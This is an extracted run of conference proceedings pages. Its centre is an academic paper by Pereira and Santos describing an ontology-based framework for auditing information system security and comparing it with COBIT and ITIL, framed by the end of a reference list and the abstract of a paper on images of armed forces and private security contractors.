FBI (2010) “Smish<strong>in</strong>g and Vish<strong>in</strong>g”, [onl<strong>in</strong>e], http://www.fbi.gov/news/stories/2010/november/<br />
cyber_112410/cyber_112410, date of access: 02/12/2010<br />
Flurry (2009) “Mobile Apps: Models, Money and Loyalty”, [onl<strong>in</strong>e], http://blog.flurry.com/bid/26376/ Mobile-Apps-<br />
Models-Money-and-Loyalty, date accessed: 26 January 2011<br />
Gosset, P. (1998) “ASPeCT: Fraud Detection Concepts: F<strong>in</strong>al Report”, Doc Ref. AC095/VOD/W22/DS/P/18/1<br />
Hall, J., Barbeau, M. and Kranakis, E. (2005) “Anomaly-based <strong>in</strong>trusion detection us<strong>in</strong>g mobility profiles of public<br />
transportation users”, the Proceed<strong>in</strong>g of IEEE International Conference on Wireless And Mobile Comput<strong>in</strong>g,<br />
Network<strong>in</strong>g And Communications, 2005 (WiMob'2005), vol. 2, pp.17-24.<br />
Kurkovsky, S. and Syta, E. (2010) “Digital natives and mobile phones: A survey of practices and attitudes about<br />
privacy and security”, In Proceed<strong>in</strong>gs of the 2010 IEEE International Symposium on Technology and Society<br />
(ISTAS), pp. 441-449<br />
Li, F., Clarke, N.L. and Papadaki, M. (2009) “Intrusion DetectionSystem for Mobile Devices: Investigation on Call<strong>in</strong>g<br />
Activity”, Proceed<strong>in</strong>gs of the 8th <strong>Security</strong> Conference, April, Las Vegas, USA<br />
Li, F., Clarke, N.L., Papadaki, M. and Dowland, P.S. (2010) “Behaviour Profil<strong>in</strong>g on Mobile Devices”, International<br />
Conference on Emerg<strong>in</strong>g <strong>Security</strong> Technologies, 6-8 September, Canterbury, UK, pp.77-82<br />
Miett<strong>in</strong>en, M., Halonen, P., and Hatonen, K. (2006) “Host-based <strong>in</strong>trusion detection for advanced mobile devices”,<br />
Proceed<strong>in</strong>gs of the 20 th International Conference on Advanced Information Network<strong>in</strong>g and Applications (AINA’<br />
06), pp 72-76<br />
Ofcom, (2010) “Communications Market Report, 2010”, [onl<strong>in</strong>e],<br />
http://stakeholders.ofcom.org.uk/b<strong>in</strong>aries/research/cmr/753567/CMR_2010_FINAL.pdf, date accessed: 20<br />
December 2010<br />
Samfat, D. and Molva, R. (1997) “IDAMN: an Intrusion Detection Architecture for Mobile Networks”, IEEE Journal on<br />
Selected Areas <strong>in</strong> Communications, vol. 15, pp.1373-1380.<br />
Securelist, (2010) “Mobile Malware Evolution: An Overview, Part 3”, [onl<strong>in</strong>e],<br />
http://www.securelist.com/en/analysis?pubid=204792080, date of access: 03/12/2010<br />
Sun, B., Chen, Z., Wang, R., Yu, F. and Leung, V.C.M. (2006) “Towards adaptive anomaly detection <strong>in</strong> cellular<br />
mobile networks”, the IEEE Consumer Communications and Network<strong>in</strong>g Conference, 2006 (CCNC 2006), Vol.<br />
2, pp. 666-670, IEEE<br />
314
Description of a Practical Application of an Information<br />
<strong>Security</strong> Audit Framework<br />
Teresa Pereira 1 and Henrique Santos 2<br />
1<br />
Polytechnic Institute of Viana do Castelo, Valença, Portugal<br />
2<br />
University of M<strong>in</strong>ho, Guimarães, Portugal<br />
tpereira@esce.ipvc.pt<br />
hsantos@dsi.um<strong>in</strong>ho.pt<br />
Abstract: Organizations are <strong>in</strong>creas<strong>in</strong>gly rely<strong>in</strong>g on <strong>in</strong>formation systems to enhance bus<strong>in</strong>ess operations, facilitate<br />
management decision-mak<strong>in</strong>g, and deploy bus<strong>in</strong>ess strategies. This dependence has <strong>in</strong>creased <strong>in</strong> current bus<strong>in</strong>ess<br />
environments where a variety of transactions <strong>in</strong>volv<strong>in</strong>g exchange of <strong>in</strong>formation and services are accomplished<br />
electronically. The technological advances, the <strong>in</strong>creases use of the Internet, the emergence of the Internet-enabled<br />
services and the current audit environment has promoted a grow<strong>in</strong>g <strong>in</strong>terest <strong>in</strong> the cont<strong>in</strong>uously deployment of<br />
audit<strong>in</strong>g <strong>in</strong>formation system security, <strong>in</strong> order to ensure the reliability of the organizational <strong>in</strong>formation systems.<br />
However the current approaches available to assist the auditor to perform a security audit is limited concern<strong>in</strong>g the<br />
used concepts and it is <strong>in</strong>creas<strong>in</strong>gly dependence on the experience and knowledge of the auditor. This paper <strong>in</strong>tends<br />
to present a developed framework, which is based on a conceptual model to assist the auditor to conduct an audit<strong>in</strong>g<br />
<strong>in</strong> the <strong>in</strong>formation system security doma<strong>in</strong>. The model developed conta<strong>in</strong>s the semantic concepts its relationships<br />
and axioms, def<strong>in</strong>ed <strong>in</strong> a subset of the <strong>in</strong>formation security doma<strong>in</strong>. This conceptual approach promotes the<br />
standardization of the term<strong>in</strong>ology used <strong>in</strong> the security <strong>in</strong>formation doma<strong>in</strong> and to improve the <strong>in</strong>formation system<br />
security audit process with<strong>in</strong> organizations. Comparisons of the current available approaches to audit <strong>in</strong>formation<br />
systems will be presented as well.<br />
Keywords: audit<strong>in</strong>g <strong>in</strong>formation system security, Information system security, ontology, COBIT, ITIL and concepts<br />
1. Introduction<br />
Nowadays the organizations are <strong>in</strong>creas<strong>in</strong>gly rely<strong>in</strong>g on <strong>in</strong>formation system to achieve bus<strong>in</strong>ess<br />
objectives. The bus<strong>in</strong>ess performance <strong>in</strong>volves the full <strong>in</strong>vestment of bus<strong>in</strong>ess process owners, s<strong>in</strong>ce<br />
they have total responsibility for all issues regard<strong>in</strong>g the bus<strong>in</strong>ess process, <strong>in</strong> particular provid<strong>in</strong>g<br />
adequate security controls. As a result <strong>in</strong>creas<strong>in</strong>g emphasis has been placed on <strong>in</strong>ternal security controls<br />
<strong>in</strong> organizations, <strong>in</strong> order to reduce risks to an acceptable level. Information system security audit is the<br />
process of gather<strong>in</strong>g and evaluat<strong>in</strong>g evidence based on the evaluation of the <strong>in</strong>formation systems<br />
performance. Furthermore it enables to determ<strong>in</strong>e whether <strong>in</strong>formation system promotes effective<br />
achievement of bus<strong>in</strong>ess objectives and whether system resources are used <strong>in</strong> an efficient manner.<br />
Therefore auditors are cont<strong>in</strong>uously confronted with the need to cooperate with their op<strong>in</strong>ion on <strong>in</strong>ternal<br />
control to management. In this context it is fundamental to the auditors a framework to assist them to<br />
substantiate their view on <strong>in</strong>ternal controls.<br />
The development of <strong>in</strong>formation systems security audit<strong>in</strong>g frameworks is the result of a jo<strong>in</strong>t study of IT<br />
expertises <strong>in</strong> response to the grow<strong>in</strong>g significance of best practices to the IT <strong>in</strong>dustry and the need for IT<br />
managers to better understand the value of IT best practices frameworks and how to implement them.<br />
The most effective best practices should be applied with<strong>in</strong> the bus<strong>in</strong>ess context, focus<strong>in</strong>g on their use to<br />
provide the most benefit to the organization. The two most well-known frameworks are the IT<br />
Infrastructure Library (ITIL) and the Control Objectives for IT (COBIT) which support a broad range of<br />
management services and have been implemented by thousands of organizations. In this paper it is<br />
established a comparison between these two methodologies with a new developed framework, which is<br />
based on the established security standards ISO/IEC_JTC1 1 (ISO/IEC_JTC1 2005) and implemented to<br />
assist auditor to perform regular audits to the organizational <strong>in</strong>formation system security. The paper is<br />
structured as follows: <strong>in</strong> the section 2 we briefly <strong>in</strong>troduces a description of the COBIT framework; section<br />
3 presents the description of ITIL; section 4 presents the developed framework to audit <strong>in</strong>formation<br />
systems security, based on the ontology structure; section 5 is performed a comparison between the<br />
COBIT and ITIL, with the framework developed; conclusions and future work are presented <strong>in</strong> section 6.<br />
1 International Organization for Standardization (ISO)/ International Electrotechnical Commission (IEC), Jo<strong>in</strong>t Technical Committee<br />
(JTC 1)<br />
315
2. COBIT<br />
Teresa Pereira and Henrique Santos<br />
COBIT is published by IT Governance Institute (ITGI) 2 and positioned as a high-level governance and<br />
control framework. ITGI is a not-for-profit research organization affiliated with the Information Systems<br />
Audit and Control Association (ISACA) focused on IT governance, assurance and security. ITGI<br />
undertakes research and publish COBIT, an open standard and framework of controls and best practice<br />
for IT governance which provides guidel<strong>in</strong>es on what can be done <strong>in</strong> an organization <strong>in</strong> terms of control<br />
activities, measurement and documentation of processes and operations.<br />
The primary focus of COBIT is on align<strong>in</strong>g use of IT with the achievement of organizational goals. The<br />
comb<strong>in</strong>ation of bus<strong>in</strong>ess and IT goals promoted by the COBIT framework enables the ability to monitor<br />
the <strong>in</strong>formation system.<br />
COBIT Framework consists of a 34 high-level control objectives, conta<strong>in</strong>s over 300 detailed IT controls<br />
and is validated to reach a balance between IT risks and <strong>in</strong>vestments <strong>in</strong> IT controls. The control<br />
objectives have been organized <strong>in</strong>to a hierarchy of processes and doma<strong>in</strong>s that are designed to help<br />
br<strong>in</strong>g alignment of bus<strong>in</strong>ess and IT objectives, by identify<strong>in</strong>g the requirements for IT resources and<br />
<strong>in</strong>formation associated with the detailed control objectives. IT processes are grouped <strong>in</strong>to four doma<strong>in</strong>s:<br />
plann<strong>in</strong>g and organization, acquisition and implementation, delivery and support and monitor<strong>in</strong>g.<br />
The conceptual COBIT framework can be approached from three po<strong>in</strong>ts: (1) <strong>in</strong>formation criteria, (2) IT<br />
resources and (3) IT processes. These three po<strong>in</strong>ts are depicted <strong>in</strong> the COBIT ‘s Cube.<br />
Figure 1: The COBIT Cube, source (ITGI 2000)<br />
To satisfy bus<strong>in</strong>ess objectives, <strong>in</strong>formation needs to conform to certa<strong>in</strong> control criteria, which COBIT<br />
refers to as bus<strong>in</strong>ess requirements for <strong>in</strong>formation. Based on the broader quality, fiduciary and security<br />
requirements, seven dist<strong>in</strong>ct, certa<strong>in</strong>ly overlapp<strong>in</strong>g <strong>in</strong>formation criteria are def<strong>in</strong>ed as follows (ITGI 2000):<br />
Effectiveness deals with <strong>in</strong>formation be<strong>in</strong>g relevant and pert<strong>in</strong>ent to the bus<strong>in</strong>ess process as well as<br />
be<strong>in</strong>g delivered <strong>in</strong> a timely, correct, consistent and usable manner.<br />
Efficiency concerns the provision of <strong>in</strong>formation through the optimal use of resources.<br />
Confidentiality concerns the protection of sensitive <strong>in</strong>formation from unauthorised disclosure.<br />
Integrity relates to the accuracy and completeness of <strong>in</strong>formation as well as to its validity <strong>in</strong><br />
accordance with bus<strong>in</strong>ess values and expectations.<br />
Availability relates to <strong>in</strong>formation be<strong>in</strong>g available when required by bus<strong>in</strong>ess process now and <strong>in</strong> the<br />
future. It also concerns the safeguard<strong>in</strong>g of necessary resources and associated capabilities.<br />
Compliance deals with comply<strong>in</strong>g with those laws, regulations and contractual arrangements to which<br />
the bus<strong>in</strong>ess process is subject, i.e., externally imposed bus<strong>in</strong>ess criteria.<br />
2 www.itgi.org<br />
316
Teresa Pereira and Henrique Santos<br />
Reliability relates to the provision of appropriate <strong>in</strong>formation for management to operate the entity<br />
and for management to exercise its f<strong>in</strong>ancial and compliance report<strong>in</strong>g responsibilities.<br />
IT resources are managed by IT processes to achieve goals that meet the bus<strong>in</strong>ess requirements of<br />
organizations. This pr<strong>in</strong>ciple of COBIT framework is illustrated <strong>in</strong> Figure 1. The IT resources<br />
identified <strong>in</strong><br />
COBIT can be def<strong>in</strong>ed as follows (ITGI 2000):<br />
Data are objects <strong>in</strong> their widest sense, structured and non-structured, graphics, sound, etc.<br />
Application Systems are understood to be the<br />
sum of manual and programmed procedures.<br />
Technology covers hardware, operat<strong>in</strong>g systems, database management systems, network<strong>in</strong>g,<br />
multimedia, etc.<br />
Facilities are all resources to house and support <strong>in</strong>formation systems.<br />
People <strong>in</strong>clude staff<br />
skills, awareness and productivity to plan, organise, acquire, deliver, support and<br />
monitor <strong>in</strong>formation systems and services.<br />
From the po<strong>in</strong>t of control and <strong>in</strong>formation systems audit, COBIT provides the Audit Guidel<strong>in</strong>es, which is a<br />
complementary tool to facilitate the application of the COBIT Framework and Control Objectives with<strong>in</strong><br />
audit and assessment activities. The purpose of the Audit Guidel<strong>in</strong>es is to provide a structure for audit<strong>in</strong>g<br />
and assess<strong>in</strong>g controls based on generally accepted audit practices that fit with<strong>in</strong> the overall COBIT<br />
scheme. The COBIT Audit Guidel<strong>in</strong>es enable the auditor to review specific IT processes aga<strong>in</strong>st COBIT’s<br />
recommended control objectives to help assure management where controls are sufficient, or to advice<br />
management where processes need to be improved (ITGI 2000). Therefore the IT process is audited by:<br />
Obta<strong>in</strong><strong>in</strong>g an understand<strong>in</strong>g of bus<strong>in</strong>ess requirements related risks, and relevant control measures;<br />
Evaluat<strong>in</strong>g the appropriateness of stated controls;<br />
Assess<strong>in</strong>g compliance by test<strong>in</strong>g whether the stated controls are work<strong>in</strong>g as expected, consistently<br />
and cont<strong>in</strong>uously way;<br />
Substantiat<strong>in</strong>g the risk of control objectives not be<strong>in</strong>g met by us<strong>in</strong>g analytical techniques and/or<br />
consult<strong>in</strong>g alternative sources.<br />
The audit guidel<strong>in</strong>es assist the auditor to provide assurance that the process is actually under control and<br />
the <strong>in</strong>formation requirements enable to achieve bus<strong>in</strong>ess<br />
objectives.<br />
3. ITIL<br />
The ITIL was<br />
developed by the British government between 1989 and 1995 as a best practice framework<br />
for IT service<br />
management. ITIL was published by Her Majesty’s Stationery Office (HMSO) <strong>in</strong> the UK on<br />
behalf of the Central Communications and Telecommunications Agency (CCTA), now <strong>in</strong>cluded with<strong>in</strong> the<br />
Office of Government Commerce (OGC 3 ). The ITIL V2 became universally accepted and is now used <strong>in</strong><br />
several countries by many organizations as the basis for effective IT service provision. In 2007 a new<br />
version of ITIL arise, result<strong>in</strong>g <strong>in</strong> a consolidated third version of ITIL. The ma<strong>in</strong> mechanism addressed by<br />
ITIL is the concept of a service, which is def<strong>in</strong>ed <strong>in</strong> ITIL V3 as follows: “A service is a means of deliver<strong>in</strong>g<br />
value to customers by facilitat<strong>in</strong>g outcomes customers want to achieve without the ownership of specific<br />
costs and risks” (ITIL 2007). All service solutions and activities should be conducted by bus<strong>in</strong>ess needs<br />
and requirements. In this context service solutions and activities must reflect the strategies and policies of<br />
the organizational service provider. ITIL is based on def<strong>in</strong><strong>in</strong>g best practices processes for IT service<br />
management and support, rather than on def<strong>in</strong><strong>in</strong>g a broad-based control framework. The key activity is<br />
the def<strong>in</strong>ition of a cont<strong>in</strong>ual service improvement, which drives ma<strong>in</strong>tenance of value delivery to<br />
customer.<br />
IT service management is concerned with plann<strong>in</strong>g, sourc<strong>in</strong>g, design<strong>in</strong>g, implement<strong>in</strong>g, operat<strong>in</strong>g,<br />
support<strong>in</strong>g<br />
and<br />
improv<strong>in</strong>g IT services that are appropriate to bus<strong>in</strong>ess needs. The role of the ITIL<br />
framework is to describe approaches, functions, roles and processes, upon which organizations may<br />
base their own practices and to give guidance at the lowest level that is applicable generally.<br />
The ITIL V3 service management is broken <strong>in</strong>to five dist<strong>in</strong>ct phases (ITIL 2007) (Woods 2010):<br />
ITIL Service Support;<br />
ITIL Service Delivery;<br />
3 www.ogc.gov.uk<br />
317
ITIL Transition;<br />
ITIL Operation;<br />
ITIL Cont<strong>in</strong>ual Service Improvement.<br />
Teresa Pereira and Henrique Santos<br />
4. A framework developed<br />
to audit <strong>in</strong>formation system security, based on a<br />
ontology<br />
The establishment of ISO/IEC_JTC1 standards promoted the standardization of the semantic concepts<br />
def<strong>in</strong>ed <strong>in</strong> the <strong>in</strong>formation security doma<strong>in</strong>. The correct understand<strong>in</strong>g and identification of those concepts<br />
are the primarily requirement to be considered <strong>in</strong> the performance of a proper exam<strong>in</strong>ation of the<br />
<strong>in</strong>formation system security effectiveness, and further to identify and characterize an occurred security<br />
<strong>in</strong>cident, as well as to estimate its impacts. The proposed conceptual framework is based on the security<br />
standard ISO_/IEC_JTC1 and <strong>in</strong>tends to assists the organization, firstly to precisely determ<strong>in</strong>e what<br />
should be protected (the assets) and their weaknesses (vulnerabilities) <strong>in</strong>volved <strong>in</strong> their daily activity.<br />
Secondly assess what vulnerabilities can be exploited by an attack, as well the threats that might be<br />
materialized <strong>in</strong> an attack. F<strong>in</strong>ally, evaluate the efficiency and the effectiveness of the policy and controls<br />
implemented, <strong>in</strong> order to evaluate if they are be<strong>in</strong>g correctly implemented or if they need any adjustment<br />
(Pereira & Santos 2010a).<br />
The Figure 2 illustrates the conceptual framework proposed, present<strong>in</strong>g these three nuclear concepts:<br />
attack, threat and assets. The<br />
auditor can select the concept from which he/she <strong>in</strong>tends to start the<br />
audit<strong>in</strong>g<br />
process, and proceed to the directed related concepts. Each concept conta<strong>in</strong>s a list of elements<br />
that are l<strong>in</strong>ked to the other concepts, conform<strong>in</strong>g to the hierarchical structure of the semantic concepts,<br />
def<strong>in</strong>ed <strong>in</strong> the ontology (Pereira & Santos 2010b). These three concepts were <strong>in</strong>cluded <strong>in</strong> the front-end of<br />
the framework, rather the others, due to the nature of the audit operation, which the auditor <strong>in</strong>tends to<br />
perform.<br />
Figure 2: Pr<strong>in</strong>t screen of the developed framework<br />
Traditionally, a security audit is conducted once an <strong>in</strong>cident has occurred (reactive followed by a<br />
corrective audit), that is when an asset has been compromised.<br />
In this case, an audit is requested <strong>in</strong><br />
order to determ<strong>in</strong>e the source of the attack and how the <strong>in</strong>cident happened, proceed<strong>in</strong>g with the<br />
adequate corrective mechanisms. However a security audit is not only about <strong>in</strong>vestigat<strong>in</strong>g security break<strong>in</strong>s,<br />
but rather to mitigate recognized threats, <strong>in</strong> order to ensure: (1) the security compliance; (2) the<br />
security of critical assets; (3) the right controls are <strong>in</strong> the right place. In this last view a security audit is<br />
performed <strong>in</strong> the context of the security risk management process, and aims to produce or evaluate a<br />
security policy.<br />
Be<strong>in</strong>g conducted by the ma<strong>in</strong> concepts and their relationships def<strong>in</strong>ed by an ontology, the proposed<br />
framework <strong>in</strong>tends<br />
to assist organizations to understand, prepare and perform security audits, by<br />
themselves.<br />
This framework does not focus exclusively on technical controls <strong>in</strong>volved with <strong>in</strong>formation<br />
318
Teresa Pereira and Henrique Santos<br />
security, but enforces procedures and practices to assist organizations to ma<strong>in</strong>ta<strong>in</strong> consistently high<br />
levels of useful and good quality <strong>in</strong>formation concern<strong>in</strong>g their <strong>in</strong>formation security systems.<br />
With<strong>in</strong> the ontology, each concept is mapped to real subjects. For example if the auditor starts to conduct<br />
the audit<strong>in</strong>g through the attack concept, usually it means that a security <strong>in</strong>cident occurred and<br />
the auditor<br />
must<br />
perform a depth analysis of the attack and analyse the implemented controls, <strong>in</strong> order to detect the<br />
security breach. The related concepts represented <strong>in</strong> the ontology, are illustrated <strong>in</strong> Figure 3 and briefly<br />
described:<br />
The vulnerability explored by the attacker;<br />
The assets<br />
affected;<br />
The security properties that were compromised; and<br />
The controls implemented<br />
to detect the attack.<br />
Figure 3: Hierarchical structure of the concept attack (for additional details see (Pereira & Santos<br />
2010a))<br />
319
Teresa Pereira and Henrique Santos<br />
As it was demonstrated <strong>in</strong> the ontology, each concept is mapped to real subjects. An <strong>in</strong>stance of this<br />
logical structure can starts for example with one <strong>in</strong>stance of an attack and followed by the available<br />
connection/l<strong>in</strong>k to the affected assets by the attack, the vulnerability it explores, and the security<br />
properties that have been compromised. Instances to these concepts are followed presented:<br />
Attack – a Trojan horse.<br />
Vulnerability - Flaws <strong>in</strong> the Web browser; email attachment mechanism; download files applications. As<br />
Trojans are executable programs, when the user opens an e-mail attachment or a downloaded file, the<br />
Trojan is <strong>in</strong>stalled <strong>in</strong> the background. Trojans <strong>in</strong>stallers can also be automatically downloaded as ActiveX<br />
controls or other malicious content when the users visit malicious web sites.<br />
Assets – Users computer; private data.<br />
CIA – Confidentiality and <strong>in</strong>tegrity.<br />
Threat – Modification.<br />
Controls – A list of mechanisms used to detect a Trojan is followed presented:<br />
Installation of anti-virus software. Antivirus programs will enable to catch some of the most popular<br />
malware.<br />
Installation of anti-Trojan software. Antivirus software is not effective aga<strong>in</strong>st some Trojans.<br />
Addition of a firewall.<br />
Block executable files from the email.<br />
Alert the user to never type commands that others tell them to type, or go to a web addresses<br />
mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones).<br />
The standard and consequently the ontology, do not go <strong>in</strong>to f<strong>in</strong>e gra<strong>in</strong> details concern<strong>in</strong>g concepts<br />
characterization when different views are possible. Currently attacks, vulnerabilities and controls are<br />
often described differently by different organizations. For each of these concepts is associated to a<br />
taxonomy aimed to classify security attacks, vulnerabilities and controls, and provid<strong>in</strong>g a structured way<br />
of view<strong>in</strong>g them. For the attack is used the Bishop taxonomy (Bishop 2004), for the vulnerabilities is used<br />
the CVE (Common Vulnerabilities and Exposures 4 ) taxonomy and for the controls is used the taxonomy<br />
presented <strong>in</strong> the security standard ISO/IEC FDIS 27001:2005(E) (ISO/IEC_JTC1 2005). The uses of<br />
taxonomies enable to achieve a better and uniform characterization of each <strong>in</strong>stance, tak<strong>in</strong>g <strong>in</strong> account<br />
different views, purposes or even perceptions. However there is noth<strong>in</strong>g limit<strong>in</strong>g the possibility of<br />
extend<strong>in</strong>g concept classes, for <strong>in</strong>stance def<strong>in</strong><strong>in</strong>g attack classes with common characteristics, all deriv<strong>in</strong>g<br />
from the same ma<strong>in</strong> fundamental class. This is demonstrated <strong>in</strong> the framework and illustrated <strong>in</strong> the<br />
Figure 4 and Figure 5. This feature gives the possibility of customization, but with the risk of lost of<br />
generalization, if not used carefully.<br />
Despite the large amount of <strong>in</strong>formation available to complete a basic ontology, we accept that each<br />
organization will develop its own view of security awareness. The framework is modular concern<strong>in</strong>g this<br />
aspect, allow<strong>in</strong>g evolv<strong>in</strong>g the ontology by add<strong>in</strong>g the relevant subjects. This way, the auditor may<br />
proceed through the exam<strong>in</strong>ation of the relevant vulnerabilities <strong>in</strong> the assets that can compromise the<br />
security of the <strong>in</strong>formation system, with<strong>in</strong> the organization; or the auditor may go along with the analyses<br />
of new threats that might be materialized <strong>in</strong> an attack.<br />
Additionally, the proposed framework <strong>in</strong>cludes the typical functions of similar tools, enabl<strong>in</strong>g a set of<br />
functionalities, like the possibility of the auditor to generate a report with all steps performed, as well as<br />
the registration date of the<br />
audit. Accord<strong>in</strong>g to the results of the auditor’ exam<strong>in</strong>ations, he can also<br />
schedule<br />
<strong>in</strong> the calendar the next audit. Moreover, if the auditor dur<strong>in</strong>g his exam<strong>in</strong>ation detects a new<br />
<strong>in</strong>cident, i.e. an attack that is not presented on the list of attacks, the auditor should report this new attack<br />
with its features, which will be validated by the adm<strong>in</strong>istrator of the framework and, after that, the<br />
adm<strong>in</strong>istrator will <strong>in</strong>dex the attack to the list of attacks. This procedure is the same if the auditor decides<br />
to conduct the audit through the exam<strong>in</strong>ation of the assets or threats and dur<strong>in</strong>g<br />
the process identifies a<br />
new<br />
vulnerability <strong>in</strong> an asset or a new threat.<br />
4 http://cve.mitre.org/<br />
320
Figure 4: An <strong>in</strong>stance of the concept attack<br />
Teresa Pereira and Henrique Santos<br />
Figure 5: An <strong>in</strong>stance of the concept attack related the asset concept<br />
The key role of this framework is to assist the audit<strong>in</strong>g process and promote improvements to the current<br />
methodologies available for <strong>in</strong>formation security management.<br />
5. Comparison of COBIT, ITIL and the Developed Framework<br />
The general function of COBIT and ITIL, and the developed framework are different <strong>in</strong> several aspects.<br />
The ma<strong>in</strong> difference between the three approaches are followed presented:<br />
COBIT focus on control objectives and IT metrics. While ITIL aims to map IT service level<br />
management. The framework developed is focused on general security doma<strong>in</strong>.<br />
The COBIT creates documents of the processes and operations, and ITIL key rule is the cont<strong>in</strong>ual<br />
improvement. While the framework developed enforce the cont<strong>in</strong>ual improvement as well, and it also<br />
enables to add new security contents to the security management process.<br />
COBIT Audit Guidel<strong>in</strong>es provides a complex structure for audit<strong>in</strong>g and assess<strong>in</strong>g controls. And ITIL is<br />
based on best practices for management and to support services. While the framework developed<br />
provide security model based on security standards (ISO/IEC_JTC1).<br />
COBIT Audit Guidel<strong>in</strong>es and ITIL best practices are “one-size-fits-all” solutions. While the framework<br />
developed provides a base model, which evolve with organizations bus<strong>in</strong>ess requirements; and<br />
promotes the shar<strong>in</strong>g of security context s<strong>in</strong>ce it follows an ontological approach.<br />
321
6. Conclusions and future work<br />
Teresa Pereira and Henrique Santos<br />
The <strong>in</strong>formation system security audit is not (or should not be) a one-time task, but a cont<strong>in</strong>ual effort to<br />
improve the protection of the organization assets and consequently to assure the normal function<strong>in</strong>g of<br />
the organization activity. Regular audits should be planned to analyze the effectiveness of the security<br />
policies, practices, measures and procedures implemented with<strong>in</strong> the context of the organization’s<br />
structure, objectives, activities and its particular view of risks. As a result, the auditor should conduct his<br />
tasks accord<strong>in</strong>gly to his experience and through the use of available frameworks, to assist the auditor to<br />
perform his work. COBIT and ITIL are currently widely used frameworks <strong>in</strong> several organizations.<br />
However they are very different <strong>in</strong> their orientation, def<strong>in</strong>ition and class of problems they address and the<br />
specific implications regard<strong>in</strong>g implementation.<br />
In this paper, we presented these two standards and established a comparison between them and the<br />
developed framework, which is based on a conceptual model approach, to support the auditor conduct<strong>in</strong>g<br />
an audit, <strong>in</strong> an <strong>in</strong>formation system security, with<strong>in</strong> the context of a given organization. This solution<br />
<strong>in</strong>troduces a new perspective to model <strong>in</strong>formation, <strong>in</strong> the security doma<strong>in</strong> and has some advantages<br />
regard<strong>in</strong>g COBIT and ITIL solutions. It enables the description of the data semantics and promot es<br />
firm<strong>in</strong>g up and unify<strong>in</strong>g the concepts and term<strong>in</strong>ology<br />
def<strong>in</strong>ed <strong>in</strong> the scope of <strong>in</strong>formation security, based<br />
on the relevant ISO/IEC_JTC1 standards. Furthermore,<br />
it enables an organization evolv<strong>in</strong>g its own<br />
<strong>in</strong>stantiation of the security ontology, obey<strong>in</strong>g to standard concepts, but embedd<strong>in</strong>g its one view and<br />
assumed risk exposition.<br />
As future work we <strong>in</strong>tend to implement the necessary adjustments to <strong>in</strong>tegrate further functionalities, e.g.,<br />
direct l<strong>in</strong>k to attack and vulnerabilities description databases, alert mechanism for ontology outdate and<br />
cont<strong>in</strong>uous monitor<strong>in</strong>g of security controls to promote early detection of security policies breaks.<br />
References<br />
Bishop, M., 2004. Introduction to computer security, Addison-Wesley Professional.<br />
ISO/IEC_JTC1, 2005. ISO/IEC FDIS 27001 Information Technology - <strong>Security</strong> Techniques - Information <strong>Security</strong><br />
Management Systems - Requirements, Geneva, Switzerland.: ISO copyright office.<br />
ITGI, 2000. CobiT Audit Guidel<strong>in</strong>es. Available at: http://techtra<strong>in</strong><strong>in</strong>g.brevard.k12.fl.us/BETC2007/Grachis-<br />
Auditguidel<strong>in</strong>es.pdf.<br />
ITIL, 2007. An Introductory Overview of ITIL V3. London: The UK Chapter of the itSMF.<br />
Pereira, T. & Santos, H., 2010a. A conceptual model approach to manage and audit <strong>in</strong>formation systems security.<br />
9th European Conference on Information Warfare and <strong>Security</strong>. Thessaloniki, Greece: Josef Demergis,<br />
University of Macedonia Thessaloniki Greece, pp. 360-366. Available at: http://academicconferences.org/eciw/eciw2011/eciw10-proceed<strong>in</strong>gs.htm.<br />
Pereira, T. & Santos, H., 2010b. A <strong>Security</strong> Audit Framework to Manage Information<br />
System <strong>Security</strong>. Em 6th<br />
Intrenational Conference, ICGS3 2010. Global <strong>Security</strong>, Safety, and Susta<strong>in</strong>ability Communications <strong>in</strong><br />
Computer and Information Science, 2010. Braga, Portugal: Spr<strong>in</strong>gerL<strong>in</strong>k, pp. 9-18. Available at:<br />
http://www.spr<strong>in</strong>gerl<strong>in</strong>k.com/content/gx40481t26025266/.<br />
Woods, T., 2010. Data Storage Management. Implement<strong>in</strong>g ITIL: Gett<strong>in</strong>g started with ITIL V3 service management.<br />
SearchStorage.com.<br />
322
Fight Over Images of the State Armed Forces and Private<br />
<strong>Security</strong> Contractors<br />
Mirva Salm<strong>in</strong>en<br />
University of Lapland, F<strong>in</strong>land<br />
msalm<strong>in</strong>e@ulapland.fi<br />
Abstract: Images of participants <strong>in</strong> conflicts held by military leaders, top politicians and adm<strong>in</strong>istrators as well as the<br />
general public make a difference both <strong>in</strong> conflicts and <strong>in</strong> times of peace. The images do not only have practical<br />
implications <strong>in</strong> warfare, but also far reach<strong>in</strong>g <strong>in</strong>fluence <strong>in</strong> people’s shared understand<strong>in</strong>g. The shared understand<strong>in</strong>g,<br />
aga<strong>in</strong>, is the arena on which suggested truths are either accepted or rejected and therefore, an arena for power<br />
struggles. Production and control over the emergence, existence and disappearance of different images of<br />
participants <strong>in</strong> conflicts have hence become goals of <strong>in</strong>formation warfare. The topic of this paper are the images<br />
produced firstly, of soldiers of the state armed forces and secondly, of employers of Private <strong>Security</strong> Contractors<br />
(PSCs). The production of these images is carried out both <strong>in</strong> discursive and non-discursive practices. This paper<br />
focuses on discursive production of the images with the help of descriptions given and pictures presented on the<br />
participants <strong>in</strong> conflicts. The two aforementioned imageries are exam<strong>in</strong>ed for the reason that <strong>in</strong> the shared<br />
understand<strong>in</strong>g they serve as a b<strong>in</strong>ary category: the armed forces functions as a norm aga<strong>in</strong>st which the existence<br />
and conduct of private security contractors are evaluated. Data of the study consists of writ<strong>in</strong>gs and pictures<br />
published <strong>in</strong> The New York Times (NYT) after a shoot<strong>in</strong>g <strong>in</strong> Baghdad <strong>in</strong> September 2007 and comment<strong>in</strong>g on the<br />
shoot<strong>in</strong>g. In addition, the paper exam<strong>in</strong>es discussion <strong>in</strong> the US House of Representatives Committee on Oversight<br />
and Government Reform (HCOGR) hear<strong>in</strong>g held 2 nd of October 2007 which discussed the matter of PSCs operat<strong>in</strong>g<br />
<strong>in</strong> Iraq and <strong>in</strong> which CEO of the company accused of misconduct <strong>in</strong> relation to the aforementioned shoot<strong>in</strong>g<br />
witnessed. The questions under scrut<strong>in</strong>y are who has the right to speak and what k<strong>in</strong>ds of images circulate <strong>in</strong> the<br />
data as well as how these images produce the b<strong>in</strong>ary category of the armed forces – private security contractors <strong>in</strong>to<br />
the shared understand<strong>in</strong>g. The role of PSCs is likely to grow <strong>in</strong> the complicated conflicts of the future and therefore,<br />
how political and military decision mak<strong>in</strong>g and people’s shared understand<strong>in</strong>g manages them is important.<br />
Keywords: images, collective mean<strong>in</strong>g production, armed forces, private security contractors<br />
